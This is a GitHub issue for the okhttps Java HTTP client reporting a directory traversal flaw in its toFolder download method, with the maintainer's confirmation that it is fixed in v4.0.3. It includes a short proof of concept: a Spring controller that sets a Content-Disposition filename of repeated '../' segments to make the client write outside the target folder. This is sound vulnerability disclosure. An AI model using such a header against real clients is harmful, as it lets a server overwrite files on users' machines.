search

troyzhxu / okhttps

如艺术一般优雅,像 1、2、3 一样简单,前后端通用,轻量却强大的 HTTP 客户端(同时支持 WebSocket 与 Stomp 协议)
https://ok.zhxu.cn
Apache License 2.0
487 stars 75 forks source link

使用toFolder方法下载文件时可能出现目录穿越漏洞 #89

Closed arandomusernone closed 2 months ago

arandomusernone commented 9 months ago

问题描述

使用toFolder方法下载文件到某个目录时,根据服务端返回的Content-Disposition 获取文件名会出现目录穿越漏洞。如果服务端返回的filename包含../`,文件就会被保存到其他路径下。

When using the toFolder method to download file to a certain directory, a directory traversal vulnerability will occur when obtaining the file name based on the Content-Disposition returned by the server. If the filename returned by the server contains../`, directory traversal will occur.

复现过程

Client:

HTTP exp = HTTP.builder()
      .baseUrl("http://127.0.0.1:8080")
      .build();
exp.sync("/a.zip")
      .get().getBody()
      .toFolder("/Users/e4stjun/Desktop/test")
      .start();

Server:

@RestController
public class ExpController {
    @RequestMapping("/a.zip")
    public String a(HttpServletResponse response)
    {
        response.setHeader("Content-Disposition","attachment;filename=../../../../../../../../../../../../../../../../../../../../../../tmp/success");
        return "success";
    }
}

使用的版本

troyzhxu commented 4 months ago

收到,下个版本修复。

troyzhxu commented 2 months ago

已在 v4.0.3 中修复:https://github.com/troyzhxu/okhttps/releases/tag/v4.0.3